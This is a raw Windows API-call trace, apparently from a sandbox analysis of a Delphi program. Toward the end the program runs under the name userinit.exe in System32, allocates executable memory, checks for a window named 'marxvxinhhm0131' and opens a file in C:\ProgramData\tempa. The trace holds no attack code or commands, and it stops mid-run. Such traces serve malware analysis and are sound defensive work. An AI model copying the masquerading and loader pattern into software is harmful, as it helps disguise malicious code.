[0200.088] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x10fa58, cchData=256 | out: lpLCData="Sep") returned 4
[0200.088] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x10fa58, cchData=256 | out: lpLCData="September") returned 10
[0200.089] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x10fa58, cchData=256 | out: lpLCData="Oct") returned 4
[0200.089] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x10fa58, cchData=256 | out: lpLCData="October") returned 8
[0200.089] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x10fa58, cchData=256 | out: lpLCData="Nov") returned 4
[0200.089] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x10fa58, cchData=256 | out: lpLCData="November") returned 9
[0200.089] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x10fa58, cchData=256 | out: lpLCData="Dec") returned 4
[0200.089] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x10fa58, cchData=256 | out: lpLCData="December") returned 9
[0200.089] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x10fa58, cchData=256 | out: lpLCData="Sun") returned 4
[0200.089] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x10fa58, cchData=256 | out: lpLCData="Sunday") returned 7
[0200.089] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x10fa58, cchData=256 | out: lpLCData="Mon") returned 4
[0200.089] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x10fa58, cchData=256 | out: lpLCData="Monday") returned 7
[0200.089] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x10fa58, cchData=256 | out: lpLCData="Tue") returned 4
[0200.089] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x10fa58, cchData=256 | out: lpLCData="Tuesday") returned 8
[0200.089] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x10fa58, cchData=256 | out: lpLCData="Wed") returned 4
[0200.089] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x10fa58, cchData=256 | out: lpLCData="Wednesday") returned 10
[0200.089] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x10fa58, cchData=256 | out: lpLCData="Thu") returned 4
[0200.089] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x10fa58, cchData=256 | out: lpLCData="Thursday") returned 9
[0200.089] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x10fa58, cchData=256 | out: lpLCData="Fri") returned 4
[0200.089] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x10fa58, cchData=256 | out: lpLCData="Friday") returned 7
[0200.089] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x10fa58, cchData=256 | out: lpLCData="Sat") returned 4
[0200.089] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x10fa58, cchData=256 | out: lpLCData="Saturday") returned 9
[0200.089] GetThreadLocale () returned 0x409
[0200.089] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x10fab4, cchData=256 | out: lpLCData="$") returned 2
[0200.089] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x10fab4, cchData=256 | out: lpLCData="0") returned 2
[0200.089] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x10fab4, cchData=256 | out: lpLCData="0") returned 2
[0200.089] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x10fbac, cchData=2 | out: lpLCData=",") returned 2
[0200.089] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x10fbac, cchData=2 | out: lpLCData=".") returned 2
[0200.089] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x10fab4, cchData=256 | out: lpLCData="2") returned 2
[0200.089] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x10fbac, cchData=2 | out: lpLCData="/") returned 2
[0200.089] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x10fab4, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0200.089] GetThreadLocale () returned 0x409
[0200.089] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x10fa80, cchData=256 | out: lpLCData="1") returned 2
[0200.089] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x10fab4, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0200.089] GetThreadLocale () returned 0x409
[0200.089] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x10fa80, cchData=256 | out: lpLCData="1") returned 2
[0200.089] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x10fbac, cchData=2 | out: lpLCData=":") returned 2
[0200.089] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x10fab4, cchData=256 | out: lpLCData="AM") returned 3
[0200.090] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x10fab4, cchData=256 | out: lpLCData="PM") returned 3
[0200.090] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x10fab4, cchData=256 | out: lpLCData="0") returned 2
[0200.090] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x10fab4, cchData=256 | out: lpLCData="0") returned 2
[0200.090] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x10fab4, cchData=256 | out: lpLCData="0") returned 2
[0200.090] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x10fbac, cchData=2 | out: lpLCData=",") returned 2
[0200.090] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0200.090] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0200.090] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0200.090] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0200.090] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0200.090] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0200.090] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0200.090] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0200.090] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0200.090] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0200.090] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0200.090] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0200.090] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0200.091] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0200.091] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0200.091] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0200.091] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0200.091] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0200.091] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0200.091] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0200.091] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0200.091] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0200.091] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0200.091] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x60
[0200.091] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x64
[0200.091] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x68
[0200.091] GetDC (hWnd=0x0) returned 0x3c010860
[0200.091] GetDeviceCaps (hdc=0x3c010860, index=90) returned 96
[0200.092] ReleaseDC (hWnd=0x0, hDC=0x3c010860) returned 1
[0200.092] GetDC (hWnd=0x0) returned 0x3c010860
[0200.092] GetDeviceCaps (hdc=0x3c010860, index=104) returned 0
[0200.092] ReleaseDC (hWnd=0x0, hDC=0x3c010860) returned 1
[0200.092] CreatePalette (plpal=0x10f810) returned 0x27080882
[0200.092] GetStockObject (i=7) returned 0x1b00017
[0200.092] GetStockObject (i=5) returned 0x1900015
[0200.092] GetStockObject (i=13) returned 0x18a002e
[0200.092] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0200.092] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0200.092] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0200.092] LoadStringA (in: hInstance=0x400000, uID=0xff4d, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0200.092] LoadStringA (in: hInstance=0x400000, uID=0xff4c, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0200.092] LoadStringA (in: hInstance=0x400000, uID=0xff4b, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0200.092] LoadStringA (in: hInstance=0x400000, uID=0xff4a, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0200.092] LoadStringA (in: hInstance=0x400000, uID=0xff49, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0200.092] LoadStringA (in: hInstance=0x400000, uID=0xff48, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0200.092] LoadStringA (in: hInstance=0x400000, uID=0xff47, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0200.092] LoadStringA (in: hInstance=0x400000, uID=0xff46, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0200.092] LoadStringA (in: hInstance=0x400000, uID=0xff45, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0200.092] LoadStringA (in: hInstance=0x400000, uID=0xff44, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0200.092] LoadStringA (in: hInstance=0x400000, uID=0xff43, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0200.092] LoadStringA (in: hInstance=0x400000, uID=0xff42, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0200.093] LoadStringA (in: hInstance=0x400000, uID=0xff41, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0200.093] LoadStringA (in: hInstance=0x400000, uID=0xff40, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0200.093] LoadStringA (in: hInstance=0x400000, uID=0xff5f, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0200.093] LoadStringA (in: hInstance=0x400000, uID=0xff5e, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0200.093] LoadStringA (in: hInstance=0x400000, uID=0xff5d, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0200.093] LoadStringA (in: hInstance=0x400000, uID=0xff5c, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0200.093] LoadStringA (in: hInstance=0x400000, uID=0xff06, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0200.093] LoadStringA (in: hInstance=0x400000, uID=0xff05, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0200.093] LoadStringA (in: hInstance=0x400000, uID=0xff04, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0200.093] LoadStringA (in: hInstance=0x400000, uID=0xff03, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0200.093] LoadStringA (in: hInstance=0x400000, uID=0xff02, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0200.093] LoadStringA (in: hInstance=0x400000, uID=0xff01, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0200.093] LoadStringA (in: hInstance=0x400000, uID=0xff00, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0200.093] LoadStringA (in: hInstance=0x400000, uID=0xff1f, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0200.093] LoadStringA (in: hInstance=0x400000, uID=0xff1e, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0200.093] LoadStringA (in: hInstance=0x400000, uID=0xff1d, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0200.093] LoadStringA (in: hInstance=0x400000, uID=0xff1c, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0200.093] LoadStringA (in: hInstance=0x400000, uID=0xff1b, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0200.093] LoadStringA (in: hInstance=0x400000, uID=0xff1a, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0200.093] LoadStringA (in: hInstance=0x400000, uID=0xff19, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0200.093] LoadStringA (in: hInstance=0x400000, uID=0xff18, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0200.093] LoadStringA (in: hInstance=0x400000, uID=0xff17, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0200.093] LoadStringA (in: hInstance=0x400000, uID=0xff16, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0200.093] LoadStringA (in: hInstance=0x400000, uID=0xff15, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0200.093] LoadStringA (in: hInstance=0x400000, uID=0xff14, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0200.093] LoadStringA (in: hInstance=0x400000, uID=0xff13, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0200.093] LoadStringA (in: hInstance=0x400000, uID=0xff12, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0200.093] LoadStringA (in: hInstance=0x400000, uID=0xff11, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0200.093] LoadStringA (in: hInstance=0x400000, uID=0xff10, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0200.094] LoadStringA (in: hInstance=0x400000, uID=0xff2f, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0200.094] LoadStringA (in: hInstance=0x400000, uID=0xff2e, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0200.094] LoadStringA (in: hInstance=0x400000, uID=0xff2d, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0200.094] LoadStringA (in: hInstance=0x400000, uID=0xff2c, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0200.094] LoadStringA (in: hInstance=0x400000, uID=0xff2b, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0200.094] LoadStringA (in: hInstance=0x400000, uID=0xff2a, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0200.094] LoadStringA (in: hInstance=0x400000, uID=0xff29, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0200.094] LoadStringA (in: hInstance=0x400000, uID=0xff28, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0200.094] LoadStringA (in: hInstance=0x400000, uID=0xff27, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0200.094] LoadStringA (in: hInstance=0x400000, uID=0xff26, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0200.094] LoadStringA (in: hInstance=0x400000, uID=0xff25, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0200.094] LoadStringA (in: hInstance=0x400000, uID=0xff24, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0200.094] LoadStringA (in: hInstance=0x400000, uID=0xff23, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0200.094] LoadStringA (in: hInstance=0x400000, uID=0xff22, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0200.094] LoadStringA (in: hInstance=0x400000, uID=0xff21, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0200.094] LoadStringA (in: hInstance=0x400000, uID=0xff20, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0200.094] LoadStringA (in: hInstance=0x400000, uID=0xff3f, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0200.094] LoadStringA (in: hInstance=0x400000, uID=0xff3e, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0200.094] LoadStringA (in: hInstance=0x400000, uID=0xff3d, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0200.094] LoadStringA (in: hInstance=0x400000, uID=0xff3c, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0200.094] LoadStringA (in: hInstance=0x400000, uID=0xff3b, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0200.094] LoadStringA (in: hInstance=0x400000, uID=0xff3a, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0200.094] LoadStringA (in: hInstance=0x400000, uID=0xff39, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0200.094] LoadStringA (in: hInstance=0x400000, uID=0xff38, lpBuffer=0x10f80c, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0200.094] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0200.095] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0200.095] GetVersion () returned 0x1db10106
[0200.095] GetCurrentProcessId () returned 0x980
[0200.095] GlobalAddAtomA (lpString="Delphi00000980") returned 0xc0ee
[0200.095] GetCurrentThreadId () returned 0x8d8
[0200.095] GlobalAddAtomA (lpString="ControlOfs00400000000008D8") returned 0xc0ed
[0200.095] RegisterClipboardFormatA (lpszFormat="ControlOfs00400000000008D8") returned 0xc18b
[0200.095] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0200.095] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0200.095] GetSystemMetrics (nIndex=19) returned 1
[0200.145] GetSystemMetrics (nIndex=75) returned 1
[0200.145] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x641310, fWinIni=0x0 | out: pvParam=0x641310) returned 1
[0200.145] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0200.145] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0200.145] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0x70111
[0200.145] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0200.145] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0200.145] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0200.145] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0x1a0067
[0200.146] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0xe01bb
[0200.146] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0x1601bd
[0200.146] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0xf020d
[0200.146] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0x1301a7
[0200.146] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0x13019d
[0200.146] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0200.146] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0200.147] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0200.147] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0200.147] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0200.147] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0200.147] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0200.147] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0200.147] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0200.147] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0200.147] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0200.147] GetDC (hWnd=0x0) returned 0x3c010860
[0200.147] GetDeviceCaps (hdc=0x3c010860, index=90) returned 96
[0200.147] ReleaseDC (hWnd=0x0, hDC=0x3c010860) returned 1
[0200.147] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0200.147] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x444d6c, dwData=0x64155c) returned 1
[0200.147] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x10fb77, fWinIni=0x0 | out: pvParam=0x10fb77) returned 1
[0200.147] CreateFontIndirectA (lplf=0x10fb77) returned 0x3b0a0854
[0200.147] GetObjectA (in: h=0x3b0a0854, c=60, pv=0x10f968 | out: pv=0x10f968) returned 60
[0200.148] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x10fa23, fWinIni=0x0 | out: pvParam=0x10fa23) returned 1
[0200.148] CreateFontIndirectA (lplf=0x10faff) returned 0x3f0a084f
[0200.148] GetObjectA (in: h=0x3f0a084f, c=60, pv=0x10f968 | out: pv=0x10f968) returned 60
[0200.148] CreateFontIndirectA (lplf=0x10fac3) returned 0x3a0a0876
[0200.148] GetObjectA (in: h=0x3a0a0876, c=60, pv=0x10f968 | out: pv=0x10f968) returned 60
[0200.148] LoadIconA (hInstance=0x400000, lpIconName="MAINICON") returned 0x0
[0200.148] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x10fad7, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0200.148] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0x10fad7 | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0200.148] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x110000
[0200.148] GetClassInfoA (in: hInstance=0x400000, lpClassName="TApplication", lpWndClass=0x10fa8c | out: lpWndClass=0x10fa8c) returned 0
[0200.149] RegisterClassA (lpWndClass=0x451c88) returned 0x20c167
[0200.149] GetSystemMetrics (nIndex=0) returned 1440
[0200.149] GetSystemMetrics (nIndex=1) returned 900
[0200.149] CreateWindowExA (dwExStyle=0x0, lpClassName="TApplication", lpWindowName="userinit", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0xe01e4
[0200.152] SetWindowLongA (hWnd=0xe01e4, nIndex=-4, dwNewLong=1118191) returned 4219500
[0200.153] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0200.153] SendMessageA (hWnd=0xe01e4, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0200.153] DefWindowProcA (hWnd=0xe01e4, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0200.164] DefWindowProcA (hWnd=0xe01e4, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0xe01c7
[0200.165] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0200.165] SetClassLongA (hWnd=0xe01e4, nIndex=-14, dwNewLong=65575) returned 0x0
[0200.165] GetSystemMenu (hWnd=0xe01e4, bRevert=0) returned 0x1201c5
[0200.167] DeleteMenu (hMenu=0x1201c5, uPosition=0xf030, uFlags=0x0) returned 1
[0200.167] DeleteMenu (hMenu=0x1201c5, uPosition=0xf000, uFlags=0x0) returned 1
[0200.167] DeleteMenu (hMenu=0x1201c5, uPosition=0xf010, uFlags=0x0) returned 1
[0200.167] GetKeyboardLayoutList (in: nBuff=64, lpList=0x10fa58 | out: lpList=0x10fa58) returned 1
[0200.168] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0200.168] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0200.168] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6d740000
[0200.169] GetProcAddress (hModule=0x6d740000, lpProcName="InitializeFlatSB") returned 0x6d77266f
[0200.169] GetProcAddress (hModule=0x6d740000, lpProcName="UninitializeFlatSB") returned 0x6d772542
[0200.169] GetProcAddress (hModule=0x6d740000, lpProcName="FlatSB_GetScrollProp") returned 0x6d771d29
[0200.169] GetProcAddress (hModule=0x6d740000, lpProcName="FlatSB_SetScrollProp") returned 0x6d77238d
[0200.169] GetProcAddress (hModule=0x6d740000, lpProcName="FlatSB_EnableScrollBar") returned 0x6d7720c9
[0200.169] GetProcAddress (hModule=0x6d740000, lpProcName="FlatSB_ShowScrollBar") returned 0x6d771fdb
[0200.169] GetProcAddress (hModule=0x6d740000, lpProcName="FlatSB_GetScrollRange") returned 0x6d771e8d
[0200.169] GetProcAddress (hModule=0x6d740000, lpProcName="FlatSB_GetScrollInfo") returned 0x6d771f0f
[0200.169] GetProcAddress (hModule=0x6d740000, lpProcName="FlatSB_GetScrollPos") returned 0x6d771ccd
[0200.169] GetProcAddress (hModule=0x6d740000, lpProcName="FlatSB_SetScrollPos") returned 0x6d77216d
[0200.169] GetProcAddress (hModule=0x6d740000, lpProcName="FlatSB_SetScrollInfo") returned 0x6d7722be
[0200.169] GetProcAddress (hModule=0x6d740000, lpProcName="FlatSB_SetScrollRange") returned 0x6d7721e2
[0200.169] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0200.169] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0200.169] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0200.169] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0200.170] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0200.170] GetCurrentThreadId () returned 0x8d8
[0200.170] GlobalAddAtomA (lpString="WndProcPtr00400000000008D8") returned 0xc0ec
[0200.170] VirtualAlloc (lpAddress=0x644000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x644000
[0200.170] ShowWindow (hWnd=0xe01e4, nCmdShow=0) returned 0
[0200.170] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0200.170] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmg.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmg.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98
[0200.170] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x10f7d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x10f7d8*=0) returned 0x0
[0200.170] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x10f7d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x10f7d0*=0) returned 0x0
